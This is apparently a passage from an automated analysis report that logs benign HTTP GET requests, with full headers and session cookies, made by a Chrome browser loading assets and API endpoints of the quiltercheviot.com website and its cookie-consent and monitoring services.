      Source: global trafficHTTP traffic detected: GET /Content/Fonts/866831/B4C49007D12296CAC.css HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /4ad25c/globalassets/logos/qc-logos/qc-secondary-logo.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /scripts/global-v3.js?v=2.5.0.20037 HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /4ad25c/globalassets/logos/qc-logos/qc_primary_logo_stkdleft1_rgb72.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=270&height=260&quality=20&rmode=crop&format=jpeg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /4ad25c/globalassets/logos/qc-logos/qc-secondary-logo.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /9/cookieControl-9.9.2.min.js HTTP/1.1Host: cc.cdn.civiccomputing.comConnection: keep-aliveOrigin: https://www.quiltercheviot.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /Util/Find/epi-util/find.js HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/svg-sprite.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/chevron.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.20037Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/information.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.20037Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/success.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.20037Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /scripts/b/ai.2.gbl.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveOrigin: https://www.quiltercheviot.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/svg-sprite.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/chevron.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/information.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/success.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /api/rolesandregions/getroles/ HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /api/message/getall/ HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/chevron-white.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.20037Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403
      Source: global trafficHTTP traffic detected: GET /4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=539&height=520&quality=70&rmode=crop&format=jpeg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM
      Source: global trafficHTTP traffic detected: GET /c/v?d=www.quiltercheviot.com&p=CookieControl%20Custom&v=9&k=98b7657ff42ad3428720295cb98d24e45c67bfd7&format=json HTTP/1.1Host: apikeys.civiccomputing.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/plain, */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.quiltercheviot.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /api/rolesandregions/getroles/?pageLink=https%3A%2F%2Fwww.quiltercheviot.com%2F HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliverequest-id: |f96cce968b834a4886747967c12e0e99.033472d96ff647edtraceparent: 00-f96cce968b834a4886747967c12e0e99-033472d96ff647ed-01sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /api/message/getall/ HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /Content/images/v3/themes/qc/chevron-white.svg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /api/rolesandregions/getroles/ HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /4ad700/siteassets/imagery/hero-banners/customer-homepage-hero-banner.jpg?width=539&height=520&quality=70&rmode=crop&format=jpeg HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /api/rolesandregions/getroles/?pageLink=https%3A%2F%2Fwww.quiltercheviot.com%2F HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z
      Source: global trafficHTTP traffic detected: GET /4ad25c/globalassets/logos/qc-logos/qcfavicon512x512.png HTTP/1.1Host: www.quiltercheviot.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.quiltercheviot.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: EPiStateMarker=true; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank; ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; ai_user=KchcxLwDXOTS907nfil9Ws|2025-03-25T12:49:04.056Z; ai_session=eZMfWWjpsv5X8Pxjs9fiCV|1742906944812|1742906944812
      Source: global trafficHTTP traffic detected: GET /c/v?d=www.quiltercheviot.com&p=CookieControl%20Custom&v=9&k=98b7657ff42ad3428720295cb98d24e45c67bfd7&format=json HTTP/1.1Host: apikeys.civiccomputing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4ad25c/globalassets/logos/qc-logos/qcfavicon512x512.png HTTP/1.1Host: www.quiltercheviot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: ARRAffinity=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; ARRAffinitySameSite=968bf87934511bc5ab969cf953dba1b74efc3f45923b920b46bcd01c441f1403; DoNotForgetLoginAgain=3/16/2025%2012:00:00%E2%80%AFAM; _gcl_au=1.1.367376048.1742906944; LoginLink=%23; LoginTitle=; LoginLinkTarget=_blank
